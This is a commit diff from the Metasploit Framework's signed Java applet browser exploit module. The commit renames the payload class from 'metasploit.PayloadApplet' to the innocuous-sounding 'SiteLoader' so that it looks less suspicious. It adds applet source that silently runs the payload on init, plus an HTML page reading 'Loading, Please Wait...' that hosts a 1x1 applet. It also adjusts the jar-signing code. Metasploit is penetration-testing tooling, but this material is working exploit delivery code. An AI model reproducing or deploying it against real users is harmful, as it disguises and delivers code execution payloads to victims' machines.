move the evil-looking metasploit.PayloadApplet to the more inocuous SiteLoader.class, re-enable rjb compiling for the applet class

git-svn-id: file:///home/svn/framework3/trunk@11249 4d416f70-5f16-0410-b530-b9f4589650da

data/exploits/java_signed_applet/META-INF/MANIFEST.MF

@@ -4,6 +4,9 @@ Created-By: 1.6.0_18 (Sun Microsystems Inc.)
 Name: metasploit/PayloadApplet.class
 SHA1-Digest: X/L7jWCXGQGhITfOvpnJg+jgUZM=
 
+Name: SiteLoader.class
+SHA1-Digest: /NL9vqsuF9lcRy+blUjLzLc5+ds=
+
 Name: metasploit/Payload.class
 SHA1-Digest: KbAIMttBcLp1zCewA2ERYkcnRU8=
 

data/exploits/java_signed_applet/META-INF/SIGNFILE.SF

@@ -1,11 +1,14 @@
 Signature-Version: 1.0
 SHA1-Digest-Manifest-Main-Attributes: s1TdOxe3gzjQrMmw0MCPecT0Dpk=
 Created-By: 1.6.0_18 (Sun Microsystems Inc.)
-SHA1-Digest-Manifest: /3/N9PvurH7pif9Ej6Ki35dLu2A=
+SHA1-Digest-Manifest: dzpmeIPQyYuf152MUqIrDnqVUCc=
 
 Name: metasploit/PayloadApplet.class
 SHA1-Digest: y6+heNFX7iv2UtUFv9ziltcUeAs=
 
+Name: SiteLoader.class
+SHA1-Digest: 1n6n1EZcQJEmgsVgihkdqUFtyFE=
+
 Name: metasploit/Payload.class
 SHA1-Digest: 70nbz45oAy6s9DR1vxQIhIxgzLc=
 

modules/exploits/multi/browser/java_signed_applet.rb

@@ -43,9 +43,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Author'        => [ 'natron' ],
 			'Version'       => '$Revision$',
 			'References'    =>
-			[
-				[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ],
-			],
+				[
+					[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ]
+				],
 			'Platform'      => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
 			'Payload'       => { 'BadChars' => '', 'DisableNops' => true },
 			'Targets'       =>
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Platform' => 'osx',
 							'Arch' => ARCH_X86,
 						}
-					],
+					]
 				],
 			'DefaultTarget' => 1
 		))
@@ -87,10 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			[
 				OptString.new(     'CERTCN', 	[ true, "The CN= value for the certificate.", "Metasploit Inc." ]),
 				OptString.new( 'APPLETNAME',	[ true, "The main applet's class name.",      "SiteLoader"		]),
-				OptString.new('PAYLOADNAME',	[ true, "The payload classes name.", 	      "SiteSupport" 	]),
+				#OptString.new('PAYLOADNAME',	[ true, "The payload classes name.", 	      "SiteSupport" 	]),
 
 				# Not implemented yet.
 				#OptString.new('PACKAGENAME',	[ true, "The package name for gen'd classes.","x"		]),
+				# Needs Rex::Zip to be able to crack zip files
 				#OptString.new('CUSTOMJAR', 	[ false, "A custom .jar applet to use.", nil]),
 			], self.class)
 		# No source right now, so don't give an option to save it
@@ -116,6 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_error
 
 			@use_static = true
+		else 
+			cp = "#{datastore["JavaCache"]}:" + File.join(Msf::Config.data_directory, "java")
+			compile( [ "#{datastore["APPLETNAME"]}" ] , [ applet_code ], [ "-classpath", "#{cp}" ])
+			applet_file = File.join(datastore["JavaCache"], "#{datastore["APPLETNAME"]}.class")
+			@compiled_applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) }
 		end
 
 		super
@@ -147,16 +153,23 @@ class Metasploit3 < Msf::Exploit::Remote
 		# jar, build one for this victim.
 
 		jar = payload.encoded_jar
-		applet_file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", "metasploit", "PayloadApplet.class")
-		applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) }
-
-		jar.add_file("metasploit/PayloadApplet.class", applet_data)
 
 		if @use_static
+			# Then build from the statically signed class files.  Note that
+			# this uses a pre-compiled version of Payload.class, so any new
+			# updates to that file in the normal javapayload will not be
+			# reflected here!
+			applet_file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", "SiteLoader.class")
+			applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) }
+			jar.add_file("SiteLoader.class", applet_data)
+
 			print_status("Building statically signed jar for #{cli.peerhost}")
 			build_static_sig(jar)
 			data = jar.to_s
 		else
+			# Then build from the class file we compiled in the exploit()
+			# method above.
+			jar.add_file("#{datastore["APPLETNAME"]}.class", @compiled_applet_data)
 			print_status("Signing file for #{cli.peerhost}")
 			# The RJB signing class requires the jar to be an actual file on
 			# the filesystem, write it out.
@@ -176,8 +189,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	def generate_html
 		html  = %Q|<html><head><title>Loading, Please Wait...</title></head> |
 		html += %Q|<body><center><p>Loading, Please Wait...</p></center> |
-		html += %Q|<applet archive="#{datastore["APPLETNAME"]}.jar" |
-		html += %Q|  code="metasploit.PayloadApplet" width="1" height="1">\n|
+		html += %Q|<applet archive="#{datastore["APPLETNAME"]}.jar"\n|
+		if @use_static
+			html += %Q|  code="SiteLoader" width="1" height="1">\n|
+		else
+			html += %Q|  code="#{datastore["APPLETNAME"]}" width="1" height="1">\n|
+		end
 		html += %Q|</applet></body></html>|
 		return html
 	end
@@ -185,9 +202,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	def build_static_sig(jar)
 		files = [
 			"metasploit/Payload.class",
-			"metasploit/PayloadApplet.class",
+			"SiteLoader.class",
 			"META-INF/MANIFEST.MF",
-			"META-INF/SIGNFILE.DSA",
+			"META-INF/SIGNFILE.RSA",
 			"META-INF/SIGNFILE.SF",
 		]
 
@@ -222,6 +239,23 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		jar
 	end
+
+	def applet_code
+		applet = %Q|
+import java.applet.*;
+import metasploit.*;
+
+public class #{datastore["APPLETNAME"]} extends Applet {
+    public void init() {
+        try {
+            Payload.main(null);
+        } catch (Exception ex) {
+            //ex.printStackTrace();
+        }
+    }
+}
+		|
+	end
 end